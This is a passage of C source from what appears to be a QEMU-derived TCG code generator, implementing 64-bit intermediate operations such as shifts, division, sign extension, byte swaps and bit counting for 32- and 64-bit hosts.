*/ tcg_gen_op2_i64(tcg_ctx, INDEX_op_not_i64, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_xor_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif } #if TCG_TARGET_REG_BITS == 32 static inline void tcg_gen_shifti_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, unsigned c, bool right, bool arith) { tcg_debug_assert(c < 64); if (c == 0) { tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1)); tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1)); } else if (c >= 32) { c -= 32; if (right) { if (arith) { tcg_gen_sari_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), c); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), 31); } else { tcg_gen_shri_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), c); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); } } else { tcg_gen_shli_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), c); tcg_gen_movi_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), 0); } } else if (right) { if (TCG_TARGET_HAS_extract2_i32) { tcg_gen_extract2_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), c); } else { tcg_gen_shri_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), c); tcg_gen_deposit_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), 32 - c, c); } if (arith) { tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), c); } else { tcg_gen_shri_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), c); } } else { if (TCG_TARGET_HAS_extract2_i32) { tcg_gen_extract2_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), 32 - c); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, TCGV_LOW(tcg_ctx, arg1), 32 - c); tcg_gen_deposit_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), t0, TCGV_HIGH(tcg_ctx, arg1), c, 32 - c); tcg_temp_free_i32(tcg_ctx, t0); } tcg_gen_shli_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), c); } } #endif void tcg_gen_shli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 64); #if TCG_TARGET_REG_BITS == 32 tcg_gen_shifti_i64(tcg_ctx, ret, arg1, arg2, 0, 0); #else if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_shl_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif } void tcg_gen_shri_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 64); #if TCG_TARGET_REG_BITS == 32 tcg_gen_shifti_i64(tcg_ctx, ret, arg1, arg2, 1, 0); #else if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_shr_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif } void tcg_gen_sari_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 64); #if TCG_TARGET_REG_BITS == 32 tcg_gen_shifti_i64(tcg_ctx, ret, arg1, arg2, 1, 1); #else if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_sar_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif } void tcg_gen_brcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 arg1, TCGv_i64 arg2, TCGLabel *l) { if (cond == TCG_COND_ALWAYS) { tcg_gen_br(tcg_ctx, l); } else if (cond != TCG_COND_NEVER) { l->refs++; #if 
TCG_TARGET_REG_BITS == 32 tcg_gen_op6ii_i32(tcg_ctx, INDEX_op_brcond2_i32, TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), TCGV_HIGH(tcg_ctx, arg2), cond, label_arg(l)); #else tcg_gen_op4ii_i64(tcg_ctx, INDEX_op_brcond_i64, arg1, arg2, cond, label_arg(l)); #endif } } void tcg_gen_brcondi_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 arg1, int64_t arg2, TCGLabel *l) { if (cond == TCG_COND_ALWAYS) { tcg_gen_br(tcg_ctx, l); } else if (cond != TCG_COND_NEVER) { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_brcond_i64(tcg_ctx, cond, arg1, t0, l); tcg_temp_free_i64(tcg_ctx, t0); } } void tcg_gen_setcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { if (cond == TCG_COND_ALWAYS) { tcg_gen_movi_i64(tcg_ctx, ret, 1); } else if (cond == TCG_COND_NEVER) { tcg_gen_movi_i64(tcg_ctx, ret, 0); } else { #if TCG_TARGET_REG_BITS == 32 tcg_gen_op6i_i32(tcg_ctx, INDEX_op_setcond2_i32, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), TCGV_HIGH(tcg_ctx, arg2), cond); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #else tcg_gen_op4i_i64(tcg_ctx, INDEX_op_setcond_i64, ret, arg1, arg2, cond); #endif } } void tcg_gen_setcondi_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_setcond_i64(tcg_ctx, cond, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } void tcg_gen_muli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { if (arg2 == 0) { tcg_gen_movi_i64(tcg_ctx, ret, 0); } else if (is_power_of_2(arg2)) { tcg_gen_shli_i64(tcg_ctx, ret, arg1, ctz64(arg2)); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_mul_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } } void tcg_gen_div_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_div_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_div_i64, ret, arg1, arg2); #elif TCG_TARGET_HAS_div2_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_sari_i64(tcg_ctx, t0, arg1, 63); tcg_gen_op5_i64(tcg_ctx, INDEX_op_div2_i64, ret, t0, arg1, t0, arg2); tcg_temp_free_i64(tcg_ctx, t0); #else gen_helper_div_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_rem_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_rem_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_rem_i64, ret, arg1, arg2); #elif TCG_TARGET_HAS_div_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_op3_i64(tcg_ctx, INDEX_op_div_i64, t0, arg1, arg2); tcg_gen_mul_i64(tcg_ctx, t0, t0, arg2); tcg_gen_sub_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #elif TCG_TARGET_HAS_div2_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_sari_i64(tcg_ctx, t0, arg1, 63); tcg_gen_op5_i64(tcg_ctx, INDEX_op_div2_i64, t0, ret, arg1, t0, arg2); tcg_temp_free_i64(tcg_ctx, t0); #else gen_helper_rem_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_divu_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_div_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_divu_i64, ret, arg1, arg2); #elif TCG_TARGET_HAS_div2_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, t0, 0); tcg_gen_op5_i64(tcg_ctx, INDEX_op_divu2_i64, ret, t0, arg1, t0, arg2); tcg_temp_free_i64(tcg_ctx, t0); #else gen_helper_divu_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_remu_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_rem_i64 tcg_gen_op3_i64(tcg_ctx, 
INDEX_op_remu_i64, ret, arg1, arg2); #elif TCG_TARGET_HAS_div_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_op3_i64(tcg_ctx, INDEX_op_divu_i64, t0, arg1, arg2); tcg_gen_mul_i64(tcg_ctx, t0, t0, arg2); tcg_gen_sub_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #elif TCG_TARGET_HAS_div2_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, t0, 0); tcg_gen_op5_i64(tcg_ctx, INDEX_op_divu2_i64, t0, ret, arg1, t0, arg2); tcg_temp_free_i64(tcg_ctx, t0); #else gen_helper_remu_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_ext8s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_ext8s_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); #elif TCG_TARGET_HAS_ext8s_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext8s_i64, ret, arg); #else tcg_gen_shli_i64(tcg_ctx, ret, arg, 56); tcg_gen_sari_i64(tcg_ctx, ret, ret, 56); #endif } void tcg_gen_ext16s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_ext16s_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); #elif TCG_TARGET_HAS_ext16s_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext16s_i64, ret, arg); #else tcg_gen_shli_i64(tcg_ctx, ret, arg, 48); tcg_gen_sari_i64(tcg_ctx, ret, ret, 48); #endif } void tcg_gen_ext32s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); #elif TCG_TARGET_HAS_ext32s_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext32s_i64, ret, arg); #else tcg_gen_shli_i64(tcg_ctx, ret, arg, 32); tcg_gen_sari_i64(tcg_ctx, ret, ret, 32); #endif } void tcg_gen_ext8u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_ext8u_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #elif TCG_TARGET_HAS_ext8u_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext8u_i64, ret, arg); #else tcg_gen_andi_i64(tcg_ctx, ret, arg, 0xffu); #endif } void tcg_gen_ext16u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_ext16u_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #elif TCG_TARGET_HAS_ext16u_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext16u_i64, ret, arg); #else tcg_gen_andi_i64(tcg_ctx, ret, arg, 0xffffu); #endif } void tcg_gen_ext32u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #elif TCG_TARGET_HAS_ext32u_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext32u_i64, ret, arg); #else tcg_gen_andi_i64(tcg_ctx, ret, arg, 0xffffffffu); #endif } /* Note: we assume the six high bytes are set to zero */ void tcg_gen_bswap16_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_bswap16_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #elif TCG_TARGET_HAS_bswap16_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_bswap16_i64, ret, arg); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext8u_i64(tcg_ctx, t0, arg); tcg_gen_shli_i64(tcg_ctx, t0, t0, 8); 
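    /* Bits 63..16 of arg are assumed zero (see the note above), so the
       OR below yields (arg >> 8) | ((arg & 0xff) << 8). */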
tcg_gen_shri_i64(tcg_ctx, ret, arg, 8); tcg_gen_or_i64(tcg_ctx, ret, ret, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } /* Note: we assume the four high bytes are set to zero */ void tcg_gen_bswap32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_bswap32_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #elif TCG_TARGET_HAS_bswap32_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_bswap32_i64, ret, arg); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_const_i64(tcg_ctx, 0x00ff00ff); /* arg = ....abcd */ tcg_gen_shri_i64(tcg_ctx, t0, arg, 8); /* t0 = .....abc */ tcg_gen_and_i64(tcg_ctx, t1, arg, t2); /* t1 = .....b.d */ tcg_gen_and_i64(tcg_ctx, t0, t0, t2); /* t0 = .....a.c */ tcg_gen_shli_i64(tcg_ctx, t1, t1, 8); /* t1 = ....b.d. */ tcg_gen_or_i64(tcg_ctx, ret, t0, t1); /* ret = ....badc */ tcg_gen_shli_i64(tcg_ctx, t1, ret, 48); /* t1 = dc...... */ tcg_gen_shri_i64(tcg_ctx, t0, ret, 16); /* t0 = ......ba */ tcg_gen_shri_i64(tcg_ctx, t1, t1, 32); /* t1 = ....dc.. */ tcg_gen_or_i64(tcg_ctx, ret, t0, t1); /* ret = ....dcba */ tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); #endif } void tcg_gen_bswap64_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 TCGv_i32 t0, t1; t0 = tcg_temp_new_i32(tcg_ctx); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_bswap32_i32(tcg_ctx, t0, TCGV_LOW(tcg_ctx, arg)); tcg_gen_bswap32_i32(tcg_ctx, t1, TCGV_HIGH(tcg_ctx, arg)); tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), t1); tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); #elif TCG_TARGET_HAS_bswap64_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_bswap64_i64, ret, arg); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); /* arg = abcdefgh */ tcg_gen_movi_i64(tcg_ctx, t2, 0x00ff00ff00ff00ffull); tcg_gen_shri_i64(tcg_ctx, t0, arg, 8); /* t0 = .abcdefg */ tcg_gen_and_i64(tcg_ctx, t1, arg, t2); /* t1 = .b.d.f.h */ tcg_gen_and_i64(tcg_ctx, t0, t0, t2); /* t0 = .a.c.e.g */ tcg_gen_shli_i64(tcg_ctx, t1, t1, 8); /* t1 = b.d.f.h. */ tcg_gen_or_i64(tcg_ctx, ret, t0, t1); /* ret = badcfehg */ tcg_gen_movi_i64(tcg_ctx, t2, 0x0000ffff0000ffffull); tcg_gen_shri_i64(tcg_ctx, t0, ret, 16); /* t0 = ..badcfe */ tcg_gen_and_i64(tcg_ctx, t1, ret, t2); /* t1 = ..dc..hg */ tcg_gen_and_i64(tcg_ctx, t0, t0, t2); /* t0 = ..ba..fe */ tcg_gen_shli_i64(tcg_ctx, t1, t1, 16); /* t1 = dc..hg.. */ tcg_gen_or_i64(tcg_ctx, ret, t0, t1); /* ret = dcbahgfe */ tcg_gen_shri_i64(tcg_ctx, t0, ret, 32); /* t0 = ....dcba */ tcg_gen_shli_i64(tcg_ctx, t1, ret, 32); /* t1 = hgfe.... 
*/ tcg_gen_or_i64(tcg_ctx, ret, t0, t1); /* ret = hgfedcba */ tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); #endif } void tcg_gen_not_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_not_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_not_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg)); #elif TCG_TARGET_HAS_not_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_not_i64, ret, arg); #else tcg_gen_xori_i64(tcg_ctx, ret, arg, -1); #endif } void tcg_gen_andc_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_andc_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_andc_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); #elif TCG_TARGET_HAS_andc_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_andc_i64, ret, arg1, arg2); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, t0, arg2); tcg_gen_and_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } void tcg_gen_eqv_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_eqv_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_eqv_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); #elif TCG_TARGET_HAS_eqv_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_eqv_i64, ret, arg1, arg2); #else tcg_gen_xor_i64(tcg_ctx, ret, arg1, arg2); tcg_gen_not_i64(tcg_ctx, ret, ret); #endif } void tcg_gen_nand_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_nand_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_nand_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); #elif TCG_TARGET_HAS_nand_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_nand_i64, ret, arg1, arg2); #else tcg_gen_and_i64(tcg_ctx, ret, arg1, arg2); tcg_gen_not_i64(tcg_ctx, ret, ret); #endif } void tcg_gen_nor_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_nor_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_nor_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); #elif TCG_TARGET_HAS_nor_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_nor_i64, ret, arg1, arg2); #else tcg_gen_or_i64(tcg_ctx, ret, arg1, arg2); tcg_gen_not_i64(tcg_ctx, ret, ret); #endif } void tcg_gen_orc_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_orc_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_orc_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); #elif TCG_TARGET_HAS_orc_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_orc_i64, ret, arg1, arg2); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, t0, arg2); tcg_gen_or_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } void tcg_gen_clz_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_clz_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_clz_i64, ret, arg1, arg2); #else gen_helper_clz_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_clzi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, uint64_t 
arg2) { #if TCG_TARGET_REG_BITS == 32 && TCG_TARGET_HAS_clz_i32 if (arg2 <= 0xffffffffu) { TCGv_i32 t = tcg_const_i32(tcg_ctx, (uint32_t)arg2 - 32); tcg_gen_clz_i32(tcg_ctx, t, TCGV_LOW(tcg_ctx, arg1), t); tcg_gen_addi_i32(tcg_ctx, t, t, 32); tcg_gen_clz_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), t); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); tcg_temp_free_i32(tcg_ctx, t); } else #endif { TCGv_i64 t = tcg_const_i64(tcg_ctx, arg2); tcg_gen_clz_i64(tcg_ctx, ret, arg1, t); tcg_temp_free_i64(tcg_ctx, t); } } void tcg_gen_ctz_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_ctz_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_ctz_i64, ret, arg1, arg2); #elif TCG_TARGET_HAS_ctpop_i64 || TCG_TARGET_HAS_clz_i64 TCGv_i64 z, t = tcg_temp_new_i64(tcg_ctx); #if TCG_TARGET_HAS_ctpop_i64 tcg_gen_subi_i64(tcg_ctx, t, arg1, 1); tcg_gen_andc_i64(tcg_ctx, t, t, arg1); tcg_gen_ctpop_i64(tcg_ctx, t, t); #else /* Since all non-x86 hosts have clz(0) == 64, don't fight it. */ tcg_gen_neg_i64(tcg_ctx, t, arg1); tcg_gen_and_i64(tcg_ctx, t, t, arg1); tcg_gen_clzi_i64(tcg_ctx, t, t, 64); tcg_gen_xori_i64(tcg_ctx, t, t, 63); #endif z = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, ret, arg1, z, arg2, t); tcg_temp_free_i64(tcg_ctx, t); tcg_temp_free_i64(tcg_ctx, z); #else gen_helper_ctz_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_ctzi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, uint64_t arg2) { #if TCG_TARGET_REG_BITS == 32 && TCG_TARGET_HAS_ctz_i32 if (arg2 <= 0xffffffffu) { TCGv_i32 t32 = tcg_const_i32(tcg_ctx, (uint32_t)arg2 - 32); tcg_gen_ctz_i32(tcg_ctx, t32, TCGV_HIGH(tcg_ctx, arg1), t32); tcg_gen_addi_i32(tcg_ctx, t32, t32, 32); tcg_gen_ctz_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), t32); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); tcg_temp_free_i32(tcg_ctx, t32); } else #endif #if !TCG_TARGET_HAS_ctz_i64 && TCG_TARGET_HAS_ctpop_i64 if (arg2 == 64) { /* This equivalence has the advantage of not requiring a fixup. 
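   ctpop((arg - 1) & ~arg) counts exactly the trailing zeros of arg, and
   evaluates to 64 for arg == 0 with no post-correction.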
*/ TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_subi_i64(tcg_ctx, t, arg1, 1); tcg_gen_andc_i64(tcg_ctx, t, t, arg1); tcg_gen_ctpop_i64(tcg_ctx, ret, t); tcg_temp_free_i64(tcg_ctx, t); } else #endif { TCGv_i64 t64 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_ctz_i64(tcg_ctx, ret, arg1, t64); tcg_temp_free_i64(tcg_ctx, t64); } } void tcg_gen_clrsb_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_HAS_clz_i64 || TCG_TARGET_HAS_clz_i32 TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_sari_i64(tcg_ctx, t, arg, 63); tcg_gen_xor_i64(tcg_ctx, t, t, arg); tcg_gen_clzi_i64(tcg_ctx, t, t, 64); tcg_gen_subi_i64(tcg_ctx, ret, t, 1); tcg_temp_free_i64(tcg_ctx, t); #else gen_helper_clrsb_i64(tcg_ctx, ret, arg); #endif } void tcg_gen_ctpop_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1) { #if TCG_TARGET_HAS_ctpop_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ctpop_i64, ret, arg1); #elif TCG_TARGET_REG_BITS == 32 && TCG_TARGET_HAS_ctpop_i32 tcg_gen_ctpop_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1)); tcg_gen_ctpop_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1)); tcg_gen_add_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 